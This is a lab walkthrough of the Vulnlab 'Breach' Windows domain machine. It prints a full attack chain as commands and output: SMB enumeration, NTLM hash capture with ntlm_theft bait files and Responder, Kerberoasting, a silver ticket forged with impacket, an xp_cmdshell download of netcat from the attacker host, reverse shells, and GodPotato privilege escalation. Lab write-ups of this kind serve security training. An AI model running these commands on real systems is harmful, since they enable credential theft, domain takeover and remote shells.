Vulnlab - Breach

Vulnlab – Breach

In this walk through, we will be going through the Breach room from Vulnlab. This room is rated as Medium on the platform and it consist of capturing of a user NTLM hash by creating documents that a domain user will likely open in a SMB share. Using the captured credentials, performed Kerberoasting to get password of user svc_mssq. Post that, a silver ticket attack have to be executed with MSSQL in order to get initial access. For Privilege Escalation, SEImpersonate Privilege needs to be abused via GodPotato exploit to get root on the target. So, let’s get started without any delay.

Breach

Machine Info:

TitleBreach
IPaddress10.10.95.5
DifficultyMedium
OSWindows
DescriptionBreach is a Medium Windows machine that requires capturing of user NTLM hash by creating documents that a domain user will likely open in a SMB share. Using the captured credentials, performed Kerberoasting to get password of user svc_mssq. Post that, a silver ticket attack have to be executed with MSSQL in order to get initial access. For Privilege Escalation, SEImpersonate Privilege needs to be abused via GodPotato exploit to get root on the target.

Enumeration:

  • I started off with a regular nmap scan along with all TCP port scan and UDP scan. Found multiple ports opened – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.

$ sudo nmap -sV -sC 10.10.95.5
 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 12:26 IST

Nmap scan report for 10.10.95.5
Host is up (0.18s latency).
Not shown: 987 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-22 06:56:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server  15.00.2000.00
| ms-sql-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|_  Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-22T06:52:26
|_Not valid after:  2054-04-22T06:52:26
|_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-22T06:56:48+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2024-04-21T06:51:40
|_Not valid after:  2024-10-21T06:51:40
|_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time.
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info: 
|   10.10.95.5:1433: 
|     Version: 
|       name: Microsoft SQL Server 
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-22T06:56:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.85 seconds

sudo nmap -p- -T5 10.10.95.5

PORT      STATE SERVICE
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
60843/tcp open  unknown
61065/tcp open  unknown
62932/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 391.54 seconds

sudo nmap -sU -T4 10.10.95.5

PORT    STATE SERVICE
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 141.03 seconds

  • Added hostname to my /etc/hosts file.

adding domain in /etc/hosts

PORT 80

  • The running webserver has a default IIS Page. Nothing fancy!

Default IIS page

  • Fired gobuster on the target but found no directories.

$ gobuster dir -u http://10.10.95.5/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.95.5/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
2024/04/22 12:42:49 Starting gobuster in directory enumeration mode
===============================================================
                                
===============================================================
2024/04/22 13:00:41 Finished
===============================================================

PORT 135

  • Tried to enumerate usernames using RPCclient but got nothing.

RPC Enumeration

PORT 139/445

  • Tried to list the shares using SMB null authentication and got some interesting ones there – share and Users.

smbclient -L 10.10.95.5

SMB Enumeration

  • Next, i tried to peek into the “share” share and got 3 potential users of the domain.

$ smbclient //10.10.95.5/share

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 17 19:41:08 2022
  ..                                DHS        0  Thu Feb 17 21:08:00 2022
  finance                             D        0  Thu Feb 17 16:49:34 2022
  software                            D        0  Thu Feb 17 16:49:12 2022
  transfer                            D        0  Thu Feb 17 19:30:35 2022

		7863807 blocks of size 4096. 2613329 blocks available
smb: \> cd finance
smb: \finance\> ls
  .                                   D        0  Thu Feb 17 16:49:34 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022

		7863807 blocks of size 4096. 2615078 blocks available
smb: \finance\> cd ..
smb: \> cd software
smb: \software\> ls
  .                                   D        0  Thu Feb 17 16:49:12 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022

		7863807 blocks of size 4096. 2615616 blocks available
smb: \software\> cd ..
smb: \> cd transfer
smb: \transfer\> ls
  .                                   D        0  Thu Feb 17 19:30:35 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022
  claire.pope                         D        0  Thu Feb 17 16:51:35 2022
  diana.pope                          D        0  Thu Feb 17 16:51:19 2022
  julia.wong                          D        0  Thu Feb 17 16:54:39 2022

		7863807 blocks of size 4096. 2615794 blocks available
smb: \transfer\> cd claire.pope\
smb: \transfer\claire.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*
smb: \transfer\claire.pope\> cd ..
smb: \transfer\> cd diana.pope\
smb: \transfer\diana.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*
smb: \transfer\diana.pope\> cd ..
smb: \transfer\> cd julia.wong\
smb: \transfer\julia.wong\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\*
smb: \transfer\julia.wong\> exit

logging in SMB share

  • Looked in to the Users share too, found nothing but a bunch of VM files.

$ smbclient //10.10.95.5/Users

Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Feb 17 18:42:16 2022
  ..                                DHS        0  Thu Feb 17 21:08:00 2022
  Default                           DHR        0  Thu Feb 10 14:40:33 2022
  desktop.ini                       AHS      174  Sat May  8 13:48:31 2021
  Public                             DR        0  Wed Sep 15 08:38:59 2021

		7863807 blocks of size 4096. 2832661 blocks available
smb: \> cd Default\
smb: \Default\> ls
  .                                 DHR        0  Thu Feb 10 14:40:33 2022
  ..                                 DR        0  Thu Feb 17 18:42:16 2022
  AppData                            DH        0  Thu Aug 19 12:15:22 2021
  Desktop                            DR        0  Thu Aug 19 11:54:36 2021
  Documents                          DR        0  Thu Feb 10 06:29:34 2022
  Downloads                          DR        0  Sat May  8 13:50:24 2021
  Favorites                          DR        0  Sat May  8 13:50:24 2021
  Links                              DR        0  Sat May  8 13:50:24 2021
  Music                              DR        0  Sat May  8 13:50:24 2021
  NTUSER.DAT                        AHn   524288  Thu Feb 17 21:08:01 2022
  ntuser.ini                       AHSn       20  Thu Aug 19 12:15:22 2021
  Pictures                           DR        0  Sat May  8 13:50:24 2021
  Saved Games                        Dn        0  Sat May  8 13:50:24 2021
  Videos                             DR        0  Sat May  8 13:50:24 2021

		7863807 blocks of size 4096. 2829523 blocks available
smb: \Default\> cd Desktop
smb: \Default\Desktop\> ls
  .                                  DR        0  Thu Aug 19 11:54:36 2021
  ..                                DHR        0  Thu Feb 10 14:40:33 2022
  EC2 Feedback.website                A      527  Tue Jun 21 21:06:17 2016
  EC2 Microsoft Windows Guide.website      A      554  Tue Jun 21 21:06:23 2016

smb: \Default\Desktop\> get "EC2 Feedback.website"
getting file \Default\Desktop\EC2 Feedback.website of size 527 as EC2 Feedback.website (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \Default\Desktop\> get "EC2 Microsoft Windows Guide.website"
getting file \Default\Desktop\EC2 Microsoft Windows Guide.website of size 554 as EC2 Microsoft Windows Guide.website (0.8 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \Default\Desktop\> cd ..
smb: \Default\> ls
  .                                 DHR        0  Thu Feb 10 14:40:33 2022
  ..                                 DR        0  Thu Feb 17 18:42:16 2022
  AppData                            DH        0  Thu Aug 19 12:15:22 2021
  Desktop                            DR        0  Thu Aug 19 11:54:36 2021
  Documents                          DR        0  Thu Feb 10 06:29:34 2022
  Downloads                          DR        0  Sat May  8 13:50:24 2021
  Favorites                          DR        0  Sat May  8 13:50:24 2021
  Links                              DR        0  Sat May  8 13:50:24 2021
  Music                              DR        0  Sat May  8 13:50:24 2021
  NTUSER.DAT                        AHn   524288  Thu Feb 17 21:08:01 2022
  ntuser.ini                       AHSn       20  Thu Aug 19 12:15:22 2021
  Pictures                           DR        0  Sat May  8 13:50:24 2021
  Saved Games                        Dn        0  Sat May  8 13:50:24 2021
  Videos                             DR        0  Sat May  8 13:50:24 2021

smb: \Default\> get NTUSER.DAT
getting file \Default\NTUSER.DAT of size 524288 as NTUSER.DAT (352.9 KiloBytes/sec) (average 168.0 KiloBytes/sec)

smb: \> exit

  • Next, i sprayed the usernames i had with the crackmapexec password parameter as well to check if some users has their usernames as passwords but got no luck.

crackmapexec smb 10.10.95.5 -u usernames.txt -p usernames.txt --continue-on-success

crackmapexec password spray

AS-REP Roasting

  • On the found usernames, i tried to perform AS-REP roasting to check if any of the have the Kerberos Pre-Authentiation disabled however found no luck.

python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.95.5 breach.vl/

AS-REP Roasting

PORT 389 (LDAP)

  • Next, i tried my luck with LDAP with null authentication but got nothing back.

LDAP Enumeration

Exploitation:

  • I tested to put a file on the “share” share and was able to to so. So, i generated bunch of files with ntlm_theft script. So, if a user on the domain checks my generated files, i will be able to capture their NTLM hashes with Responder.

python3 ntlm_theft.py --generate all --server 10.8.2.6 --filename breach

Creating docs using ntlm_theft.py

putting files on the share

  • After putting my files in each folder of the share. After a couple of minutes, i got a hit at my Responder listener and got the NetNTLMV2 hash of user Julia.Wong.

sudo python3 Responder.py -I tun0

Responder result

Julia.Wong::BREACH:e97e9ce91c17dd24:E708C01FC1CE3E70A9F7ACCBB9319065:010100000000000000E9F759BD94DA01A580F8BA31DEC4E800000000020008005900350051005A0001001E00570049004E002D0041004C0030004C004D004A0043005A0046003700530004003400570049004E002D0041004C0030004C004D004A0043005A004600370053002E005900350051005A002E004C004F00430041004C00030014005900350051005A002E004C004F00430041004C00050014005900350051005A002E004C004F00430041004C000700080000E9F759BD94DA01060004000200000008003000300000000000000001000000002000002F81CF33D02685BFE9E78F04D11EC4FB31365E5DD736AABB06B37D04D31FFA660A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0038002E0032002E0036000000000000000000

  • Cracked the hash using hashcat and got the password of user Julia.Wong.

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -O

Hash cracked

  • Logged into her share and got the user flag.

smbclient //10.10.95.5/share -U julia.wong --password=Computer1

cd transfer/julia.wong

get local.txt

local flag

Kerberoasting

  • After getting the flag. I wasn’t able to get a shell as user julia.wong, so enumerated other users on the domain. Found a list of them as per the below result. The interesting one in them was the svc_mssql account. We already know from the nmap scan that MSSQL is running on the target.

crackmapexec smb 10.10.95.5 -u julia.wong -p Computer1 --users

Enumerating domain users using CME

  • Next, performed Kerberosating and got the hash for the svc_mssql SPN. Cracked it with hashcat and got the password.

python3 ~/Tools/impacket/examples/GetUserSPNs.py breach.vl/julia.wong:Computer1 -dc-ip 10.10.95.5 -request

Kerberosating

$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a6fb065aa9ae44c3e2617d1733f9b283$ad242f3eb74ed27fd0873e3247d4fe35aa90c1cf8ecb687307c80c4dc13885d2b4b0b7a58ac147db44ceb1de373dbf6db845967cad32faca6f9243b50aad0163884d0cb1556ef723ca967b2d09bba9a2d394997ad4d78f36b0ad54315efe164424a4de3d87c8f346e35efc5e51ea7f9244b8f4298fb1c3159963db0e2cbc14caece2f7ba2beff119024fd71b3547bbab03f556ebb980b706eac5a48c1870fe6c9a48955f2819597971abcc6166e962c6cce4a246472094c660d9da4e41623598ebe6e90888d42863ccfbce12a3f43fec2fe4fc68c5dce7ac670044364c028484b00985924ff6e01e3705b3a4f05cf9f3f23967e9198050d70370a07dfcc6373c91ae9f1834640c96af752ebd31ce75b2d5e1f7d13ea85a0bcb0c110b5fd1e619373019760b5063ddc5440c12be3141328a515cef6775c6d7646273f5b69a107a1b687a4c315511e9a9cdb0ce8fdc79dec416eca79867e55757bd26066a0162d53bd8b9308210490795b05eff619867e93ce4323389899785e17322b591464bb9e529c913030c3bc330e1570f9be37bf9f9fd5886ff14bff2e26030bbffb749f0fed99511a967081241e0abe57cd928d88d1b622c4c5105ca8de72388a19c0f66bfb5b183821ec85079b73140c860b98dbc31e7282d8c76836603310f0997f1eefdf55b9410f61293b072608c0afd244febbe28112739f958249663880128a41ecd65e405ee938e2492519211ae710665d72323ab2bc428a9da4f4fb45893f54e2cc5a3ffd58a344c6a657dd7722d6107ea284de65544e419977956840a3ec1356c668d92533f4a61238cccb3969e63d402656c7de088e12f7d960af069ddbb22740456f2f416f35fb98cd2beac9b0a9fd0f694524ecb7f06d5def6f1a73f1d8da6e3316fb81cbf994dc9a05ce09f8bd98296f20b20af55d1aa54edde4d591be68ff4bed47ad53fa20ee546765a45559a4a708f708b3348ecb7bc81b4550cbd972b61e690ab2152164f0fe3b7ba39e5f0b89cf7644e60276175d83a810a6ba92e6ddd7cb7d7f2ad81867289707af7f0ab7dfbec56d275fbc34634267ed52edf129dcbce28ecebeeea6ccffd34516aca170d06144b92440dfe04349ec522f0fa0726f185ff1749174c13bbbeaf33b051f1e1af10fb406468c835c3e3593b4200b7139f3585f603a415da926a3809b8e5cab2ac1983e3b37462000f18f2e8804679ba97ea773d80991aa5b5c26543e5d0d4558b2dc3e6cb6b7c3b87de80a9a1bc8ec8cd4c5dcd2ba187b99456745fed21a083dc1298fe1c1cd0f197d4cae4764923ec0e627494edfc1e5f13113d6a92557fa88c2620d847759be6769cb28547f439a77855fa64b772b32b0f4e5f49e0705c4aca4eecb59fd5a1e410de75368e083de8ca2027a563b5206ff429af2a6a92851bcd9ccb907c2cee057db956ad2773c9f9426bf421b42788a1f6c57bcfd0f7be597e35f1

hashcat -m 13100 sql_svc.hash /usr/share/wordlists/rockyou.txt -O

Hash cracked

Silver Ticket Attack

  • I was still not able to get a shell access on the target with the svc_mssql creds. Tried to access the MSSQL with mssqlclient but got a limited shell. So, i tried to perform a Silver Ticket attack.

A Silver Ticket Attack is when an attacker forges authentication tickets in Microsoft’s Active Directory system, allowing them unauthorized access to network resources without legitimate credentials. It’s a type of cyber-attack exploiting weaknesses in the Kerberos authentication protocol.

In order to create a Silver Ticket for any service. We need three things:

  1. Domain SID
  2. NTLM hash of the user
  3. SPN Name

  • To find the Domain SID, i used impacket’s Lookupsid script with Julia Wong creds.

python3 ~/Tools/impacket/examples/lookupsid.py breach.vl/Julia.Wong:[email protected]

Silver Ticket Attack

  • Used the below online utility to generate the NTLM hash of the svc_mssql password.

NTML Hash Generator: https://codebeautify.org/ntlm-hash-generator

NTML Hash Generator

  • At last, created the silver ticket by using impacket’s ticketer script specifying the privilege to that of an Administrator.

impacket.ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator

creating a silver ticket

Getting a shell

  • Now, i used the generated ticket to log into the MSSQL server and configured it to download a netcat binary to the target and executing to give us a reverse shell.

export KRB5CCNAME=Administrator.ccache

impacket.mssqlclient -k -no-pass breach.vl -windows-auth

EXECUTE sp_configure 'show advanced options', 1;

RECONFIGURE;

EXECUTE sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';

EXECUTE xp_cmdshell 'mkdir C:\Temp';

EXECUTE xp_cmdshell 'powershell.exe iwr -uri http://10.8.2.6:8000/nc.exe -Outfile C:\Temp\nc.exe';

EXECUTE xp_cmdshell 'C:\Temp\nc.exe 10.8.2.6 4444 -e cmd.exe';

exporting the admin ticket

downloading payload

got initial access

Privilege Escalation:

  • Once i landed a shell on the target. Looked into the privileges assigned to the user and found SEImpersonate Privilege enabled. So, i went directly for the Potato exploits.

whoami /all

whoami /all

  • Used GodPotato exploit on target to get a shell as NT Authority/SYSTEM.

GodPotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 10.8.2.6 5555"

GodPotato exploit

got root

Also Read: Vulnlab – Baby

Conclusion:

Conclusion

So that was “Breach” for you. We started off with a regular nmap scan and found multiple ports opened – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more. Next, created some documents using ntlm_theft.py and placed them in a SMB share which eventually help us to capture the hash of user Julia.Wong. Cracked the hash and performed Kerberoasting to get password of svc_mssql user. Next, performed a Silver ticket attack to get initial access on the target. For Privilege Escalation, SEImpersonate Privilege was abused via GodPotato exploit to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top